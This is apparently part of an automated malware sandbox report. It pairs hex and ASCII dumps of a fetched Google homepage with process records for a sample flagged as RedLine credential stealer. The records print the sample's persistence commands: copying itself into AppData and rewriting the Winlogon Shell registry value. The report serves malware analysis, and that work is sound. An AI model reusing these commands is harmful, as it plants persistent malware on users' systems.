                                                  2022-06-26 07:48:21 UTC31INData Raw: 2e 62 76 2e 66 2c 71 3d 64 28 22 31 22 29 3b 6e 3d 64 28 6e 29 3b 63 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 31 2f 63 29 3b 76 61 72 20 45 3d 64 28 22 34 35 35 39 37 32 34 33 31 2e 30 22 29 2c 55 3d 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 36 30 37 2e 31 5f 70 30 22 29 2c 49 3d 64 28 22 63 6f 6d 22 29 2c 56 3d 64 28 22 65 6e 22 29 2c 57 3d 0a 64 28 22 47 42 52 22 29 3b 76 61 72 20 79 3d 30 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 31 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 32 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 34 29 3b 61 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c 66 2c 22 26 6f 67 65 3d 22 2c 61 2c 22 26 6f 67 65 78
                                                  Data Ascii: .bv.f,q=d("1");n=d(n);c=Math.round(1/c);var E=d("455972431.0"),U="&oggv="+d("es_plusone_gc_20220607.1_p0"),I=d("com"),V=d("en"),W=d("GBR");var y=0;h.a("")&&(y|=1);h.a("")&&(y|=2);h.a("")&&(y|=4);a=["//www.google.com/gen_204?atyp=i&zx=",f,"&oge=",a,"&ogex
                                                  2022-06-26 07:48:21 UTC32INData Raw: 62 29 3b 70 28 22 73 70 73 22 2c 57 62 29 3b 70 28 22 73 70 64 22 2c 24 62 29 3b 70 28 22 70 61 61 22 2c 54 62 29 3b 70 28 22 70 72 6d 22 2c 55 62 29 3b 6d 62 28 22 67 62 64 34 22 2c 55 62 29 3b 0a 69 66 28 68 2e 61 28 22 22 29 29 7b 76 61 72 20 61 63 3d 7b 64 3a 68 2e 61 28 22 22 29 2c 65 3a 22 22 2c 73 61 6e 77 3a 68 2e 61 28 22 22 29 2c 70 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 39 36 22 2c 63 70 3a 22 31 22 2c 78 70 3a 68 2e 61 28 22 31 22 29 2c 6d 67 3a 22 25 31 24 73 20 28 64 65 6c 65 67 61 74 65 64 29 22 2c 6d 64 3a 22 25 31 24 73 20 28 64 65 66 61 75 6c 74 29 22 2c 6d 68 3a 22 32 32 30 22 2c 73 3a 22 31 22 2c 70 70 3a 5a 62 2c
                                                  Data Ascii: b);p("sps",Wb);p("spd",$b);p("paa",Tb);p("prm",Ub);mb("gbd4",Ub);if(h.a("")){var ac={d:h.a(""),e:"",sanw:h.a(""),p:"https://lh3.googleusercontent.com/ogw/default-user=s96",cp:"1",xp:h.a("1"),mg:"%1$s (delegated)",md:"%1$s (default)",mh:"220",s:"1",pp:Zb,
                                                  2022-06-26 07:48:21 UTC34INData Raw: 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 6c 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e 62 65 68 61 76 69 6f 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 6c 6f 61 64 7d 2c 6d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 74 72 79 7b 6a 63 28 64 6f 63 75 6d 65 6e 74 29 7c 7c 28 64 7c 7c 28 62 3d 22 6f 67 2d 75 70 2d 22 2b 62 29 2c 6b 63 28 29 3f 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49
                                                  Data Ascii: c=function(){try{return!!e.localStorage&&"object"==typeof e.localStorage}catch(a){return!1}},lc=function(a){return a&&a.style&&a.style.behavior&&"undefined"!=typeof a.load},mc=function(a,b,c,d){try{jc(document)||(d||(b="og-up-"+b),kc()?e.localStorage.setI
                                                  2022-06-26 07:48:21 UTC35INData Raw: 7b 73 70 3a 68 2e 62 28 22 30 2e 30 31 22 2c 31 29 2c 74 6c 64 3a 22 63 6f 2e 75 6b 22 2c 70 72 69 64 3a 22 31 22 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 72 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 6f 72 28 76 61 72 20 6c 3b 28 6c 3d 6b 5b 6d 2b 2b 5d 29 26 26 22 6d 22 21 3d 6c 5b 30 5d 26 26 21 6c 5b 31 5d 2e 61 75 74 6f 3b 29 3b 6c 26 26 28 73 61 28 32 2c 6c 5b 30 5d 29 2c 6c 5b 31 5d 2e 75 72 6c 26 26 72 61 28 6c 5b 31 5d 2e 75 72 6c 2c 6c 5b 30 5d 29 2c 6c 5b 31 5d 2e 6c 69 62 73 26 26 43 26 26 43 28 6c 5b 31 5d 2e 6c 69 62 73 29 29 3b 6d 3c 6b 2e 6c 65 6e 67 74 68 26 26 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 30 3c 66 2d 2d 3f 73 65 74 54 69 6d 65 6f 75 74 28 62 2c 30 29 3a 61 28 29 7d 76 61 72
                                                  Data Ascii: {sp:h.b("0.01",1),tld:"co.uk",prid:"1"});function rc(){function a(){for(var l;(l=k[m++])&&"m"!=l[0]&&!l[1].auto;);l&&(sa(2,l[0]),l[1].url&&ra(l[1].url,l[0]),l[1].libs&&C&&C(l[1].libs));m<k.length&&setTimeout(a,0)}function b(){0<f--?setTimeout(b,0):a()}var
                                                  2022-06-26 07:48:21 UTC36INData Raw: 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 64 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 66 3d 65 2e 69 3b 76 61 72 20 67 3d 66 2e 63 28 22 31 22 2c 30 29 2c 68 3d 2f 5c 62 67 62 6d 74 5c 62 2f 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 22 2b 67 29 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 22 2b 61 29 3b 62 26 26 66 2e 6c 28 62 2c 68 2e 74 65 73 74 28 62 2e 63 6c 61
                                                  Data Ascii: sure Library Authors. SPDX-License-Identifier: Apache-2.0*/var d=window.gbar.i.i;var e=window.gbar;var f=e.i;var g=f.c("1",0),h=/\bgbmt\b/,k=function(a){try{var b=document.getElementById("gb_"+g),c=document.getElementById("gb_"+a);b&&f.l(b,h.test(b.cla
                                                  2022-06-26 07:48:21 UTC38INData Raw: 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6b 2e 65 78 65 63 53 63 72 69 70 74 7c 7c 6b 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 68 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 6c 3b 68 2e 6c 65 6e 67 74 68 26 26 28 6c 3d 68 2e 73 68 69 66 74 28 29 29 3b 29 68 2e 6c 65 6e 67 74 68 7c 7c 76 6f 69 64 20 30 3d 3d 3d 67 3f 6b 3d 6b 5b 6c 5d 26 26 6b 5b 6c 5d 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 5b 6c 5d 3f 6b 5b 6c 5d 3a 6b 5b 6c 5d 3d 7b 7d 3a 6b 5b 6c 5d 3d 67 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74
                                                  Data Ascii: ndefined"==typeof k.execScript||k.execScript("var "+h[0]);for(var l;h.length&&(l=h.shift());)h.length||void 0===g?k=k[l]&&k[l]!==Object.prototype[l]?k[l]:k[l]={}:k[l]=g;}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(funct
                                                  2022-06-26 07:48:21 UTC39INData Raw: 67 62 5f 38 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 6d 61 70 73 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 6c 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 4d 61 70 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 37 38 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 38 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 50 6c 61 79 3c 2f 73 70 61 6e 3e 3c 2f
                                                  Data Ascii: gb_8 href="https://maps.google.co.uk/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></
                                                  2022-06-26 07:48:21 UTC40INData Raw: 22 67 62 6d 63 20 67 62 73 62 20 67 62 73 62 69 73 22 3e 3c 6f 6c 20 69 64 3d 67 62 6d 6d 20 63 6c 61 73 73 3d 22 67 62 6d 63 63 20 67 62 73 62 69 63 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 34 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6c 65 6e 64 61 72 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 61 6c 65 6e 64 61 72 3f 74 61 62 3d 77 63 22 3e 43 61 6c 65 6e 64 61 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 35 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 54 22 3e 54 72 61 6e 73
                                                  Data Ascii: "gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.co.uk/?hl=en&tab=wT">Trans
                                                  2022-06-26 07:48:21 UTC41INData Raw: 31 2c 7b 74 3a 36 36 7d 29 3b 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 73 62 74 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 73 62 62 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 67 62 67 3e 3c 68 32 20 63 6c 61 73 73 3d 67 62 78 78 3e 41 63 63 6f 75 6e 74 20 4f 70 74 69 6f 6e 73 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 63 62 3e 3c 2f 73 70 61 6e 3e 3c 6f 6c 20 63 6c 61 73 73 3d 67 62 74 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63
                                                  Data Ascii: 1,{t:66});; });</script></li></ol><div class=gbsbt></div><div class=gbsbb></div></div></div></li></ol></div><div id=gbg><h2 class=gbxx>Account Options</h2><span class=gbtcb></span><ol class=gbtc><li class=gbt><a target=_top href="https://accounts.google.c
                                                  2022-06-26 07:48:21 UTC43INData Raw: 62 78 34 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 6d 63 55 74 69 34 46 30 6e 31 4c 53 35 44 72 76 4a 70 76 4d 42 51 27 3e 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 65 6c 70 26 26 67 62 61 72 2e 65 6c 70 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 63 65 6e 74 65 72 3e 3c 62 72 20 63 6c 65 61 72 3d 22 61 6c 6c 22 20 69 64 3d 22 6c 67 70 64 22 3e 3c 64 69 76 20 69 64 3d 22 6c 67 61 22 3e 3c 69 6d 67 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 22 20 68 65 69 67 68 74 3d 22 39 32 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 77 68 69 74 65 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 5f 32 37 32 78
                                                  Data Ascii: bx4></div><script nonce='mcUti4F0n1LS5DrvJpvMBQ'>window.gbar&&gbar.elp&&gbar.elp()</script></div></div><center><br clear="all" id="lgpd"><div id="lga"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x
                                                  2022-06-26 07:48:21 UTC44INData Raw: 61 6c 75 65 29 7b 74 68 69 73 2e 63 68 65 63 6b 65 64 20 3d 20 31 3b 69 66 20 28 74 68 69 73 2e 66 6f 72 6d 2e 69 66 6c 73 69 67 29 74 68 69 73 2e 66 6f 72 6d 2e 69 66 6c 73 69 67 2e 64 69 73 61 62 6c 65 64 20 3d 20 66 61 6c 73 65 3b 7d 0a 65 6c 73 65 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 27 2f 64 6f 6f 64 6c 65 73 2f 27 3b 7d 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 41 4a 69 4b 30 65 38 41 41 41 41 41 59 72 67 64 56 54 38 65 36 56 58 30 66 63 76 6c 4d 46 4a 71 44 6a 4c 5f 71 2d 42 49 45 4d 72 4f 22 20 6e 61 6d 65 3d 22 69 66 6c 73 69 67 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 74 64 3e 3c 74 64 20 63 6c 61 73 73 3d 22 66 6c 20 73 62 6c 63 22 20 61 6c
                                                  Data Ascii: alue){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;}else top.location='/doodles/';};})();</script><input value="AJiK0e8AAAAAYrgdVT8e6VX0fcvlMFJqDjL_q-BIEMrO" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" al
                                                  2022-06-26 07:48:21 UTC45INData Raw: 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 74 70 72 65 66 64 6f 6d 61 69 6e 3f 70 72 65 66 64 6f 6d 3d 47 42 26 61 6d 70 3b 70 72 65 76 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 26 61 6d 70 3b 73 69 67 3d 4b 5f 66 55 46 49 4c 5f 43 76 43 6b 75 45 76 57 44 57 72 30 55 57 39 47 7a 34 35 74 49 25 33 44 22 3e 47 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 74 3b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 22 3e 26 63 6f 70 79 3b 20 32 30 32 32 20 2d 20 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 70 6f 6c 69 63 69 65 73 2f 70 72 69 76 61 63 79 2f 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 20 2d
                                                  Data Ascii: ttps://www.google.com/setprefdomain?prefdom=GB&amp;prev=https://www.google.co.uk/&amp;sig=K_fUFIL_CvCkuEvWDWr0UW9Gz45tI%3D">Google.co.uk</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2022 - <a href="/intl/en/policies/privacy/">Privacy</a> -
                                                  2022-06-26 07:48:21 UTC46INData Raw: 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 26 26 67 6f 6f 67 6c 65 2e 74 69 63 6b 26 26 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 78 6a 73 6c 73 22 29 3b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 3b 76 61 72 20 63 3d 22 53 43 52 49 50 54 22 3b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 22 3d 3d 3d 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 26 26 28 63 3d 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 67 29 7b 62 3d 6e 75 6c 6c 3b 76 61 72 20 6b 3d 64 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 69 66 28 6b 26 26 6b 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 7b 74 72 79 7b 62 3d 6b 2e 63 72 65 61 74 65 50 6f 6c 69 63
                                                  Data Ascii: ogle.timers.load&&google.tick&&google.tick("load","xjsls");var b=document;var c="SCRIPT";"application/xhtml+xml"===b.contentType&&(c=c.toLowerCase());c=b.createElement(c);if(void 0===g){b=null;var k=d.trustedTypes;if(k&&k.createPolicy){try{b=k.createPolic
                                                  2022-06-26 07:48:21 UTC48INData Raw: 6f 6d 5c 78 32 32 2c 5c 78 32 32 69 73 62 68 5c 78 32 32 3a 32 38 2c 5c 78 32 32 6a 73 6f 6e 70 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 6d 73 67 73 5c 78 32 32 3a 7b 5c 78 32 32 63 69 62 6c 5c 78 32 32 3a 5c 78 32 32 43 6c 65 61 72 20 53 65 61 72 63 68 5c 78 32 32 2c 5c 78 32 32 64 79 6d 5c 78 32 32 3a 5c 78 32 32 44 69 64 20 79 6f 75 20 6d 65 61 6e 3a 5c 78 32 32 2c 5c 78 32 32 6c 63 6b 79 5c 78 32 32 3a 5c 78 32 32 49 5c 5c 75 30 30 32 36 23 33 39 3b 6d 20 46 65 65 6c 69 6e 67 20 4c 75 63 6b 79 5c 78 32 32 2c 5c 78 32 32 6c 6d 6c 5c 78 32 32 3a 5c 78 32 32 4c 65 61 72 6e 20 6d 6f 72 65 5c 78 32 32 2c 5c 78 32 32 6f 73 6b 74 5c 78 32 32 3a 5c 78 32 32 49 6e 70 75 74 20 74 6f 6f 6c 73 5c 78 32 32 2c 5c 78 32 32 70 73 72 63 5c 78 32 32 3a 5c 78 32 32 54
                                                  Data Ascii: om\x22,\x22isbh\x22:28,\x22jsonp\x22:true,\x22msgs\x22:{\x22cibl\x22:\x22Clear Search\x22,\x22dym\x22:\x22Did you mean:\x22,\x22lcky\x22:\x22I\\u0026#39;m Feeling Lucky\x22,\x22lml\x22:\x22Learn more\x22,\x22oskt\x22:\x22Input tools\x22,\x22psrc\x22:\x22T
                                                  2022-06-26 07:48:21 UTC49INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0



                                                  Target ID:0
                                                  Start time:09:48:15
                                                  Start date:26/06/2022
                                                  Path:C:\Users\user\Desktop\atpRyiZGTE.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\atpRyiZGTE.exe"
                                                  Imagebase:0x10a0000
                                                  File size:1598976 bytes
                                                  MD5 hash:0515B4D32D6D65D19832858957F0847F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:13
                                                  Start time:09:49:00
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                                                  Imagebase:0x1190000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:14
                                                  Start time:09:49:01
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff647620000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:15
                                                  Start time:09:49:02
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 38
                                                  Imagebase:0xa50000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:19
                                                  Start time:09:49:32
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                                                  Imagebase:0x1190000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:20
                                                  Start time:09:49:33
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff647620000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:21
                                                  Start time:09:49:34
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 45
                                                  Imagebase:0xa50000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:23
                                                  Start time:09:49:42
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                                                  Imagebase:0x7ff7338d0000
                                                  File size:59392 bytes
                                                  MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:30
                                                  Start time:09:50:22
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):
                                                  Commandline:ping 127.0.0.1 -n 45
                                                  Imagebase:
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  No disassembly